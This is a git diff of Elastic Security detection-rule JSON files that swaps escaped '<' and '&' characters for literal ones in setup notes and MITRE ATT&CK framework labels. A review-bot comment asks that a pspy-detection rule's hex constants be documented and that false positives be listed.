+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
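Review bot: The hex constants in the new rule's query — `auditd.data.a0 : ("ffffffffffffff9c", "ffffff9c")` and `auditd.data.a2 : ("80000", "88000")` — are explained nowhere in the file, and both fields are declared in `required_fields` with `"type": "unknown"`, so a reader cannot tell from the rule itself what the ten-event sequence is actually keyed on. The a0 values appear to be AT_FDCWD (-100) written as 64-bit and 32-bit hex and a2 appears to be an openat flag bitmask, but that should be stated rather than inferred; a sentence in `description` such as `The a0 values correspond to AT_FDCWD (-100) in 64-/32-bit hex and a2 to the openat flag values observed for pspy.` would make the detection logic reviewable and keep future tuning honest. The file also carries no `false_positives` entry, although any monitoring agent that enumerates `/proc` on a short interval could plausibly satisfy `runs=10` within the 5s `maxspan`; naming that class of benign source would help analysts triage the low-severity alerts this produces.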
@@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_104.json b/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_104.json index 8517ecf0b07..4ec836e40fc 100644 --- a/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_104.json +++ b/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_104.json @@ -51,7 +51,7 @@ ], "risk_score": 73, "rule_id": "bdcf646b-08d4-492c-870a-6c04e3700034", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_105.json b/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_105.json index 90ec7cc6851..83c10b5f19b 100644 
--- a/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_105.json +++ b/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_105.json @@ -51,7 +51,7 @@ ], "risk_score": 73, "rule_id": "bdcf646b-08d4-492c-870a-6c04e3700034", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_106.json b/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_106.json index 66868568584..d566f09f878 100644 --- a/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_106.json +++ b/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_106.json 
@@ -51,7 +51,7 @@ ], "risk_score": 73, "rule_id": "bdcf646b-08d4-492c-870a-6c04e3700034", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_107.json b/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_107.json index c293160b3e6..586b2666d69 100644 --- a/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_107.json +++ b/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_107.json 
@@ -50,7 +50,7 @@ ], "risk_score": 73, "rule_id": "bdcf646b-08d4-492c-870a-6c04e3700034", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/bdfebe11-e169-42e3-b344-c5d2015533d3_1.json b/packages/security_detection_engine/kibana/security_rule/bdfebe11-e169-42e3-b344-c5d2015533d3_1.json index 44ac91ecb43..229d7650b20 100644 --- a/packages/security_detection_engine/kibana/security_rule/bdfebe11-e169-42e3-b344-c5d2015533d3_1.json +++ b/packages/security_detection_engine/kibana/security_rule/bdfebe11-e169-42e3-b344-c5d2015533d3_1.json 
@@ -34,7 +34,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/be4c5aed-90f5-4221-8bd5-7ab3a4334751_1.json b/packages/security_detection_engine/kibana/security_rule/be4c5aed-90f5-4221-8bd5-7ab3a4334751_1.json index 15c9bffc94c..923f56e4b6d 100644 --- a/packages/security_detection_engine/kibana/security_rule/be4c5aed-90f5-4221-8bd5-7ab3a4334751_1.json +++ b/packages/security_detection_engine/kibana/security_rule/be4c5aed-90f5-4221-8bd5-7ab3a4334751_1.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_104.json b/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_104.json index 4cbbb98b1ab..65a7017286d 100644 --- a/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_104.json +++ b/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_104.json 
@@ -60,7 +60,7 @@ ], "risk_score": 47, "rule_id": "be8afaed-4bcd-4e0a-b5f9-5562003dde81", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_105.json b/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_105.json index 4beb9059d84..9d8e2816c20 100644 --- a/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_105.json +++ b/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_105.json 
@@ -60,7 +60,7 @@ ], "risk_score": 47, "rule_id": "be8afaed-4bcd-4e0a-b5f9-5562003dde81", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_106.json b/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_106.json index e3c7635e8ba..95c9d07ca27 100644 --- a/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_106.json +++ b/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_106.json 
@@ -60,7 +60,7 @@ ], "risk_score": 47, "rule_id": "be8afaed-4bcd-4e0a-b5f9-5562003dde81", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_107.json b/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_107.json index 1930bc50080..3702d67ed8d 100644 --- a/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_107.json +++ b/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_107.json 
@@ -59,7 +59,7 @@ ], "risk_score": 47, "rule_id": "be8afaed-4bcd-4e0a-b5f9-5562003dde81", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_102.json b/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_102.json index 9f83e1d74cc..c0e4077cac9 100644 --- a/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_102.json +++ b/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_102.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_103.json b/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_103.json index 777e577dcaa..ab75b33a839 100644 --- a/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_103.json +++ b/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_103.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_104.json b/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_104.json index 61b3c6c8ae4..ab002751dfb 100644 --- a/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_104.json +++ b/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_104.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_205.json b/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_205.json index cc46d12e725..1ad5314e59d 100644 --- a/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_205.json +++ b/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_205.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/bf8c007c-7dee-4842-8e9a-ee534c09d205_1.json b/packages/security_detection_engine/kibana/security_rule/bf8c007c-7dee-4842-8e9a-ee534c09d205_1.json index 629a43a1c7b..54c70b7b882 100644 --- a/packages/security_detection_engine/kibana/security_rule/bf8c007c-7dee-4842-8e9a-ee534c09d205_1.json +++ b/packages/security_detection_engine/kibana/security_rule/bf8c007c-7dee-4842-8e9a-ee534c09d205_1.json @@ -45,7 +45,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/bf8c007c-7dee-4842-8e9a-ee534c09d205_2.json b/packages/security_detection_engine/kibana/security_rule/bf8c007c-7dee-4842-8e9a-ee534c09d205_2.json index 2fe95b34800..1beddd4908f 100644 --- a/packages/security_detection_engine/kibana/security_rule/bf8c007c-7dee-4842-8e9a-ee534c09d205_2.json +++ b/packages/security_detection_engine/kibana/security_rule/bf8c007c-7dee-4842-8e9a-ee534c09d205_2.json @@ -46,7 +46,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/bfba5158-1fd6-4937-a205-77d96213b341_1.json b/packages/security_detection_engine/kibana/security_rule/bfba5158-1fd6-4937-a205-77d96213b341_1.json index 46bcd22ae45..9aca4266be5 100644 --- a/packages/security_detection_engine/kibana/security_rule/bfba5158-1fd6-4937-a205-77d96213b341_1.json +++ b/packages/security_detection_engine/kibana/security_rule/bfba5158-1fd6-4937-a205-77d96213b341_1.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", 
diff --git a/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_104.json b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_104.json index 229ea0f3e11..f48d3be63d0 100644 --- a/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_104.json +++ b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_104.json @@ -78,7 +78,7 @@ ], "risk_score": 73, "rule_id": "bfeaf89b-a2a7-48a3-817f-e41829dc61ee", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -92,7 +92,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -114,7 +114,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_105.json b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_105.json index 0304b6edb0c..a8fb1c9c851 100644 --- a/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_105.json 
+++ b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_105.json @@ -78,7 +78,7 @@ ], "risk_score": 73, "rule_id": "bfeaf89b-a2a7-48a3-817f-e41829dc61ee", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -91,7 +91,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -113,7 +113,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_106.json b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_106.json index ecc2a890b2e..87ec0c126d9 100644 --- a/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_106.json +++ b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_106.json 
@@ -88,7 +88,7 @@ ], "risk_score": 73, "rule_id": "bfeaf89b-a2a7-48a3-817f-e41829dc61ee", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -101,7 +101,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -123,7 +123,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_107.json b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_107.json index 0e7229093b1..bda1252e400 100644 --- a/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_107.json +++ b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_107.json 
@@ -88,7 +88,7 @@ ], "risk_score": 73, "rule_id": "bfeaf89b-a2a7-48a3-817f-e41829dc61ee", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -102,7 +102,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -124,7 +124,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_108.json b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_108.json index 9e5140854a8..a38807c3dcf 100644 --- a/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_108.json +++ b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_108.json 
@@ -88,7 +88,7 @@ ], "risk_score": 73, "rule_id": "bfeaf89b-a2a7-48a3-817f-e41829dc61ee", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -103,7 +103,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -125,7 +125,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -147,7 +147,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_109.json b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_109.json index e0bbd39d06a..3a7f721a7ea 100644 --- a/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_109.json +++ b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_109.json 
@@ -88,7 +88,7 @@ ], "risk_score": 73, "rule_id": "bfeaf89b-a2a7-48a3-817f-e41829dc61ee", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -103,7 +103,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -125,7 +125,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -147,7 +147,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_102.json b/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_102.json index 9be590bfe14..6ccd64942a8 100644 --- a/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_102.json 
+++ b/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_102.json @@ -52,7 +52,7 @@ ], "risk_score": 73, "rule_id": "c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_103.json b/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_103.json index 20957d8ba07..b1a937fb78e 100644 --- a/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_103.json 